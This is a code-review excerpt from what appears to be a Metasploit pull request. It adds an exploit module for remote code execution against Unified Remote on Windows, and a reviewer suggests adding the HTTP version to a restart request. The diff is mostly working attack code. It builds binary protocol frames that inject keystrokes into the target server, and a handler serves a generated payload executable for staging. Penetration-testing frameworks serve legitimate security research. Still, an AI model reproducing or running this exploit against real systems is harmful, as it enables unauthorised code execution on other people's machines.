modules/exploits/windows/misc/unified_remote_rce.rb

```diff
@@ -0,0 +1,358 @@
+
+  def string_header_two
+    string_header_two = "\x00\x01\x08"
+    string_header_two << "Action\x00" # 416374696f6e 00
+    string_header_two << "\x07\x05"
+    string_header_two << "ID\x00" # 4944 00
+    string_header_two << "Relmtech.Keyboard\x00" # 52656c6d746563682e4b6579626f617264 00
+    string_header_two << "\x02"
+    string_header_two << "Layout\x00" # 4c61796f7574 00
+    string_header_two << "\x06"
+    string_header_two << "Controls\x00" # 436f6e74726f6c73 00
+    string_header_two << "\x02\x00\x02"
+    string_header_two << "OnAction\x00" # 4f6e416374696f6e 00
+    string_header_two << "\x02"
+    string_header_two << "Extras\x00" # 457874726173 00
+    string_header_two << "\x06"
+    string_header_two << "Values\x00" # 56616c756573 00
+    string_header_two << "\x02\x00\x05"
+    string_header_two << "Value\x00" # 56616c7565 00
+  end
+
+  def string_header_three
+    string_header_three = "\x00\x00\x00\x00\x05"
+    string_header_three << "Name\x00" # 4e616d65 00
+    string_header_three << "toggle\x00" # 746f67676c65 00
+    string_header_three << "\x00\x08"
+    string_header_three << "Type\x00" # 54797065 00
+    string_header_three << "\x08\x00\x00\x00\x08"
+    string_header_three << "Request\x00" # 52657175657374 00
+    string_header_three << "\x07\x02"
+    string_header_three << "Run\x00" # 52756e 00
+    string_header_three << "\x02"
+    string_header_three << "Extras\x00" # 457874726173 00
+    string_header_three << "\x06"
+    string_header_three << "Values\x00" # 56616c756573 00
+    string_header_three << "\x02\x00\x05"
+    string_header_three << "Value\x00" # 56616c7565 00
+  end
+
+  def string_footer
+    string_footer = "\x00\x00\x00\x00\x05"
+    string_footer << "Name\x00" # 4e616d65 00
+    string_footer << "toggle\x00" # 746f67676c65 00
+    string_footer << "\x00\x05"
+    string_footer << "Source\x00" # 536f7572636500
+    # this line shows up in logs as who connected
+    string_footer << "#{@client_name}\x00" # 616e64726f69642d64373038653134653532383463623831 00
+    string_footer << "\x00"
+  end
+
+  def send_key(key, press_return: false)
+    if key == ' '
+      key = space_key
+    end
+    contents = "#{string_header_two}#{key}#{string_header_three}#{key}#{string_footer}"
+    contents = "#{string_header_one(contents.length)}#{contents}"
+    sock.put(contents)
+    if press_return
+      contents = "#{string_header_two}#{ret_key}#{string_header_three}#{ret_key}#{string_footer}"
+      contents = "#{string_header_one(contents.length)}#{contents}"
+      sock.put(contents)
+    end
+  end
+
+  def on_request_uri(cli, _req)
+    p = generate_payload_exe
+    send_response(cli, p)
+    print_good("Payload request received, sending #{p.length} bytes of payload for staging")
+  end
+
+  def restart_server
+    http_sock = connect(false, { 'RPORT' => datastore['WEBSERVER'].to_i })
+    # http client overrides sock, so we had to pick one... long live sock
+    request =	"GET /system/restart\r\n"
```

Comment:
Is it expected to follow HTTP protocol specs? If yes, I believe the HTTP version should be added:
```suggestion
    request =	"GET /system/restart HTTP/1.1\r\n"
```